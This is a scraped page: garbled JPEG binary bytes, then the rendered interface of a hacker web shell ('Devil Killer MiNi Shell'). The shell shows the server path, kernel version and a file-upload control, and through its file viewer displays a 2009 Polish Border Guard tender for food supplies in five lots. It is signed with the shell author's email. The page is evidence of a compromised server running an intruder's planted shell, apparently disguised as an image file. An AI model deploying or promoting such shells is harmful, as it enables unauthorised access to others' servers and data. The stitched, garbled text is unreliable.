JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/20248-N-2009.html

<p class="kh_header"><b>Białystok: Przetarg nieograniczony na zakup produktów ogólnospożywczych (sprawa nr 4/ZP/WTiZ/09)</b><br>
<b>Numer ogłoszenia: 20248 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podlaski Oddział Straży Granicznej im. gen. Henryka Minkiewicza , ul. Bema 100, 15-370 Białystok, woj. podlaskie, tel. 085 7145171, faks 085 7484218.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.podlaski.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup produktów ogólnospożywczych (sprawa nr 4/ZP/WTiZ/09).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa produktów ogólnospożywczych podzielonych na V grup towarowych określonych w załącznikach nr 1 a-e do SIWZ.
Dostawy będą realizowane w dwóch transzach, w asortymencie, ilości i terminie określonym przez  Zamawiającego.
Dostarczany Zamawiającemu asortyment musi  spełniać wymogi jakościowe zgodne z obowiązującymi normami oraz być w pierwszym gatunku.
Termin przydatności do spożycia produktów powinien wynosić co najmniej 6 miesięcy od dnia dostawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.33.14.00-1, 15.33.22.90-3, 15.41.11.00-3, 15.87.00.00-7, 15.89.72.00-4, 15.13.10.00-5, 15.87.12.70-7, 15.87.21.00-2, 15.87.24.00-5, 15.87.11.10-8, 15.33.14.27-6, 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.89.10.00-0, 15.60.00.00-4, 15.61.33.00-1, 15.86.00.00-4, 15.85.11.00-9, 15.31.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy  : 1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,  1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełniania warunków wymaganych od wykonawców dokonana zostanie 
w systemie spełnia - nie spełnia na podstawie przedstawionych przez Wykonawcę dokumentów potwierdzających spełnienie warunków.
Nie spełnienie chociażby jednego z wymienionych warunków skutkować będzie wykluczeniem Wykonawcy z przedmiotowego postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.2)	oświadczenie o spełnieniu warunków z art. 22 ust.1 pkt.1-4 ustawy prawo zamówień publicznych - zgodne w treści z załączonym do SIWZ wzorem -Załącznik nr 4..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.podlaski.strazgraniczna.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podlaski Oddział Straży Granicznej ul. Bema 100, 15- 370  Białystok.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 11:00, miejsce: Kancelaria Jawna Wydziału Prezydialnego POSG w Białymstoku przy ul. Bema 100, bud. 2 pok. 100A (kod pocztowy 15-370).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> GRUPA I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA I: 1. Chrzan konserwowy w occie 12kg -Opakowanie szklane o zawartości produktu netto  do 200 g po odcieku, 2.Ogórek konserwowy 8kg-Opakowanie szklane o zawartości produktu netto 400 - 550 g po odcieku, 3. Papryka konserwowa 8kg-Opakowanie szklane o zawartości produktu netto 400 - 550 g po odcieku, 4. Sałatka szwedzka 7kg-Opakowanie szklane o zawartości produktu netto 400 - 600 g po odcieku, 5. Sałatka wielowarzywna 5kg-Opakowanie szklane o zawartości produktu netto 400 - 600 g po odcieku, 6. Groszek zielony konserwowy 2kg-Puszka do 0,5kg, 7. Kukurydza konserwowa 3kg-Puszka do 0,5kg 8. Dżem wysokosłodzony - różne smaki 62kg-Opakowanie jednorazowe a` 25 g..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0, 15.33.14.00-1, 15.33.22.90-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GRUPA II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy będą realizowane w dwóch transzach, w asortymencie, ilości i terminie określonym przez  Zamawiającego.
Dostarczany Zamawiającemu asortyment musi  spełniać wymogi jakościowe zgodne z obowiązującymi normami oraz być w pierwszym gatunku.
Termin przydatności do spożycia produktów powinien wynosić co najmniej 6 miesięcy od dnia dostawy
1. Olej roślinny 100l-Butelka pojemności 1 l, 2. Liść laurowy 1kg-Opakowanie detaliczne. Torebka do 20 g., 3. Papryka mielona słodka 2kg-Opakowanie detaliczne. Torebka do 20 g., 4. Pieprz naturalny mielony 3kg-Opakowanie detaliczne. Torebka do 20 g., 5. Majeranek 1kg-Opakowanie detaliczne. Torebka do 20 g., 6. Ziele angielskie 2kg-Opakowanie detaliczne. Torebka do 20 g., 7. Sól kuchenna  180kg-Opakowanie  o pojemności 1 kg, 8. Przyprawa do zup w płynie 40l-Butelka szklana o pojemności 1 l, 9. Przyprawa do mięsa 2kg-Opakowanie detaliczne. Torebka do 40 g., 10. Przyprawa do ryb 1,5kg-Opakowanie detaliczne. Torebka do 40 g., 11. Ocet 8l-Butelka szklana o pojemności 0,5 l, 12. Kwasek cytrynowy spożywczy 0,5kg-Opakowanie detaliczne. Torebka do 20 g., 13. Przyprawa do drobiu 1kg-Opakowanie detaliczne. Torebka do 40 g., 14. Przyprawa uniwersalna do potraw w proszku 5kg-Opakowanie detaliczne. Torebka do 500 g., 15. Koncentrat pomidorowy 30% 60kg-Opakowanie detaliczne do 200 g, 16. Majonez 28kg-Opakowanie szklane o zawartości produktu netto  500 - 800 g, 17. Musztarda 28kg-Opakowanie z tworzywa o zawartości produktu netto  do 500g z możliwością wyciskania (tuba), 18. Ketchup 28kg-Opakowanie z tworzywa o zawartości produktu netto  do 500g z możliwością wyciskania (tuba), 19. Koncentrat rosół drobiowy (baza do zup) 15kg-Wiaderko o pojemności do 3 kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.11.00-3, 15.87.00.00-7, 15.87.23.00-4, 15.87.22.00-3, 15.87.12.70-7, 15.87.21.00-2, 15.87.24.00-5, 15.87.11.10-8, 15.33.14.27-6, 15.87.12.73-8, 15.87.12.50-1, 15.87.12.30-5, 15.89.10.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> GRUPA III.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy będą realizowane w dwóch transzach, w asortymencie, ilości i terminie określonym przez  Zamawiającego.
Dostarczany Zamawiającemu asortyment musi  spełniać wymogi jakościowe zgodne z obowiązującymi normami oraz być w pierwszym gatunku.
Termin przydatności do spożycia produktów powinien wynosić co najmniej 6 miesięcy od dnia dostawy
1. Kawa zbożowa 7kg-Opakowanie do 500 g, 2. Ryż 57kg-Opakowanie do 1 kg (torba papierowa), 3. Mąka pszenna 100kg-Opakowanie do 1 kg (torba papierowa), 4. Kasza gryczana 57kg-Opakowanie do 0,5 kg, 5. Kasza manna 7kg-Opakowanie do 0,5 kg (torba papierowa), 6. Mąka ziemniaczana 1kg-Opakowanie do 1 kg (torba papierowa), 7. Kisiel - różne smaki 5kg-Opakowania detaliczne. Torebka do 100 g, 8. Budyń w proszku - różne smaki 5kg-Opakowania detaliczne. Torebka do 100 g, 9. Kasza jęczmienna mazurska 57kg-Opakowanie do 0,5 kg, 10. Płatki kukurydziane 7kg-Opakowanie do 0,5 kg, 11. Mieszanka zbożowa Musli 7kg-Opakowanie do 0,5 kg, 12. Makaron dwujajeczny świderki 57kg-Opakowanie do 1 kg, 13. Makaron nitki długie 12kg-Opakowanie 0,4 kg.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.61.33.00-1, 15.61.40.00-5, 15.61.21.00-2, 15.31.30.00-5, 15.61.30.00-8, 15.61.33.11-1, 15.61.33.13-5, 15.85.11.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GRUPA IV.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy będą realizowane w dwóch transzach, w asortymencie, ilości i terminie określonym przez  Zamawiającego.
Dostarczany Zamawiającemu asortyment musi  spełniać wymogi jakościowe zgodne z obowiązującymi normami oraz być w pierwszym gatunku.
Termin przydatności do spożycia produktów powinien wynosić co najmniej 6 miesięcy od dnia dostawy
1. Cukier puder 2kg-Opakowanie do 0,5 kg, 2. Cukier kryształ 450kg-Opakowanie 1 kg (torba papierowa), 3. Miód naturalny  40kg-Miód w opakowaniach jednorazowych a` 25 g, 4. Kakao naturalne 2kg-W opakowaniach a` 100 g, 5. Czekolada pełna mleczna  7kg-Tabliczka a`100 g, 6. Batonik czekoladowy nadziewany - różne smaki 7kg-Baton czekoladowy nadziewany o wadze 45-50 g, 7. Wafel kakaowy  7kg-Opakowanie detaliczne a` 20 g, 8. Paluszki solone 7kg-Opakowanie detaliczne a` do 150 g, 9. Herbatniki kruche bez polewy 7kg-Opakowanie detaliczne do 50 g, 10. Batonik z czekolady deserowej nadziewany  7kg-Baton w czekoladzie deserowej z nadzieniem mlecznym o wadze około 35-45 g, 11. Cukier waniliowy 0,1kg-Opakowanie detaliczne. Torebka do 20 g., 12. Herbata ekspresowa w torebkach a`1,5g 40kg-Waga torebki z herbatą 1.5 g. Opakowanie detaliczne do 100 szt., 13. Galaretka owocowa - różne smaki 30kg-Opakowania detaliczne. Torebka do 100 g, 14. Syrop owocowy - różne smaki 40kg-Butelka do 0,5 l, 15. Napój herbaciany rozpuszczalny - różne smaki 40kg-Torebka do 0,5 kg..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4, 15.83.16.00-8, 15.84.10.00-5, 15.84.22.00-4, 15.84.22.20-0, 15.84.23.00-5, 15.84.00.00-8, 15.86.41.00-3, 15.33.22.40-8, 15.32.18.00-2, 15.86.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> GRUPA  V.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawy będą realizowane w dwóch transzach, w asortymencie, ilości i terminie określonym przez  Zamawiającego.
Dostarczany Zamawiającemu asortyment musi  spełniać wymogi jakościowe zgodne z obowiązującymi normami oraz być w pierwszym gatunku.
Termin przydatności do spożycia produktów powinien wynosić co najmniej 6 miesięcy od dnia dostawy
1. Konserwa mięsna 15kg-Możliwość otwarcia bez  otwieracza. Opakowanie jednostkowe o wadze 120-140 g, 2. Konserwa drobiowa 15kg-Możliwość otwarcia bez  otwieracza. Opakowanie jednostkowe o wadze 120-140 g, 3. Konserwa pasztet wieprzowy 15kg-Możliwość otwarcia bez  otwieracza. Opakowanie jednostkowe o wadze 120-140  g, 4. Konserwa pasztet drobiowy 15kg-Możliwość otwarcia bez  otwieracza. Opakowanie jednostkowe o wadze 120-140 g, 5. Konserwa śledź w oleju do  15kg-Możliwość otwarcia bez  otwieracza. Opakowanie jednostkowe o wadze 145-170 g, 6. Konserwa śledź w pomidorach  15kg-Możliwość otwarcia bez  otwieracza. Opakowanie jednostkowe o wadze 150-170 g, 7. Dania gotowe - fasolka po bretońsku 75kg-Pojemność opakowania szklanego (słoiki) powinna wynosić w granicach 450 - 600 g. Wartość energetyczna opakowania powinna wynosić w granicach 1000 kcal., 8. Dania gotowe - zrazy z kapustą 75kg-Pojemność opakowania szklanego (słoiki) powinna wynosić w granicach 450 - 600 g. Wartość energetyczna opakowania powinna wynosić w granicach 1000 kcal..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.89.72.00-4, 15.89.43.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com